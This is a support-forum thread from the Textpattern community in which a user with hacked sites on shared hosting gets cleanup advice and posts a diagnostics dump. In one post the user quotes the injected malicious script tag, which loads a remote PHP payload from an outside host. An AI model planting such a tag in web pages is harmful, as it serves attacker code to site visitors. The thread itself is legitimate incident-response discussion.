Issues with sites getting hacked.

fowler · 2012-03-06 05:37:59

A few of my sites have been hacked recently. PHP files are modified with offending code and new files are added to my server. I’m trying to figure out if this is a Textpattern issue or something with my host. I’m not really sure where to look first.

Any pointers would be great. I’d consider myself a novice when it comes to this sort of thing, so take it slow ;)

milosevic · 2012-03-06 08:35:47

Fortunatetly for you, textpattern stores the programation of pages onto database tables so, if you haven’t done any strange thing (like editing .htaccess), you can delete all textpattern files and folders and upload a fresh set of textpattern files. (remember to save your config.php file to stablish the connection between textpattern and the database and the images and/or files uploadeds like content).

Any way, before deleting, make a backup on your computer.

If the database hasen’t been hacked, the site will be clean.

Last edited by milosevic (2012-03-06 08:36:09)

Dragondz · 2012-03-06 08:58:38

Hi

if some files has been added can you say where that had be done and also wich version of textpattern you use?

wet · 2012-03-06 12:37:44

Please post the output of the Textpattern diagnostics tab ♫…

colak · 2012-03-06 17:04:50

I would change all my passwords including ftp and mysql

tye · 2012-03-07 01:58:36

If you are on shared hosting, I’d also check with you host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.

fowler · 2012-03-07 03:11:10

“If you are on shared hosting, I’d also check with you host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.”

It is in fact shared hosting. It’s happened multiple times on the same host, so that could most likely be it.

I’m switching to Media Temple VS.. anyone have any luck with them?

I would post a diagnostic dump, but I recently went through and updated everything in a panic. So far so good, but I figure it’s not going to last for long.

Installs have varied from 4.2 to 4.4.1.

fowler · 2012-03-07 03:14:46

Actually, just came across this:

- – - – - – -
Textpattern version: 4.4.1 (r3575)
Last Update: 2012-01-06 18:15:27/2012-02-22 03:18:35
Document root: /home/wag_redbull/faultline.redbullprojects.com
$path_to_site: /home/wag_redbull/faultline.redbullprojects.com
Textpattern path: /home/wag_redbull/faultline.redbullprojects.com/textpattern
Permanent link mode: section_id_title
Temporary directory path: /home/wag_redbull/faultline.redbullprojects.com/textpattern/tmp
Site URL: www.faultline.redbullprojects.com
PHP version: 5.2.17
GD Image Library: version bundled (2.0.34 compatible), supported formats: GIF, JPG, PNG
Server TZ: America/Los_Angeles
Server Local Time: 2012-03-06 19:20:08
DST enabled?: 0
Automatically adjust DST setting?: 0
Time Zone: America/Yakutat (-32400)
MySQL: 5.1.53-log
Locale: en_US.UTF-8
Server: Apache
PHP Server API: cgi-fcgi
RFC 2616 headers: 0
Server OS: Linux 2.6.32.45-grsec-2.2.2-r3
Active plugins: rss_auto_excerpt-0.5, lam_image_uploader-0.6c
Admin-side theme: classic 4.4.1

Pre-flight check:
————————————
/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists
Some Textpattern files have been modified: /home/wag_redbull/faultline.redbullprojects.com/index.php, /home/wag_redbull/faultline.redbullprojects.com/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_b2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_blogger.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mt.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mtdb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_wp.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_article.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_auth.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_category.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_diag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_discuss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_file.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_form.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_image.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_import.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_link.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_list.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_log.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_page.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_plugin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_prefs.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_section.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_tag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/index.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/IXRClass.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/admin_config.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/class.thumb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/classTextile.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/constants.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/taglib.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_db.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_forms.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_head.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_html.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_misc.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_theme.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_update.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_wrapper.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/atom.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/comment.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/log.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/rss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/search.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/taghandlers.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/theme/classic/classic.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_1.0.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.3.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.4.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.5.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.6.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.7.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.8.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.2.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.3.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.4.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_update.php
————————————

.htaccess file contents:
————————————
#DirectoryIndex index.php index.html

#Options +FollowSymLinks
#Options -Indexes
#ErrorDocument 403 default

<IfModule mod_rewrite.c> RewriteEngine On #RewriteBase /relative/web/path/

RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^(.+) – [PT,L]

RewriteCond %{REQUEST_URI} !=/favicon.ico RewriteRule ^(.*) index.php

RewriteCond %{HTTP:Authorization} !^$ RewriteRule .* – [E=REMOTE_USER:%{HTTP:Authorization}]
</IfModule>

#php_value register_globals 0

————————————

maruchan · 2012-03-07 03:43:28

Can you post the contents of index.php?

tye · 2012-03-07 04:07:43

and remove the /setup/ folder

/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists

fowler · 2012-03-07 05:16:27

Setup folder has been removed.

This is the script that it’s injecting:

<script src="http://laprot98ocolle.rr.nu/mm.php?d=1"></script>

I’m also finding this stuff in Wordpress installs on the same server.

Last edited by fowler (2012-03-07 05:17:06)

maruchan · 2012-03-07 05:36:35

I’m also finding this stuff in Wordpress installs on the same server.

So have you ruled out an exploited Wordpress vulnerability?

Textpattern CMS

Textpattern CMS support forum

#1 2012-03-06 05:37:59

Issues with sites getting hacked.

#2 2012-03-06 08:35:47

Re: Issues with sites getting hacked.

#3 2012-03-06 08:58:38

Re: Issues with sites getting hacked.

#4 2012-03-06 12:37:44

Re: Issues with sites getting hacked.

#5 2012-03-06 17:04:50

Re: Issues with sites getting hacked.

#6 2012-03-07 01:58:36

Re: Issues with sites getting hacked.

#7 2012-03-07 03:11:10

Re: Issues with sites getting hacked.

#8 2012-03-07 03:14:46

Re: Issues with sites getting hacked.

#9 2012-03-07 03:43:28

Re: Issues with sites getting hacked.

#10 2012-03-07 04:07:43

Re: Issues with sites getting hacked.

#11 2012-03-07 05:16:27

Re: Issues with sites getting hacked.

#12 2012-03-07 05:36:35

Re: Issues with sites getting hacked.

Board footer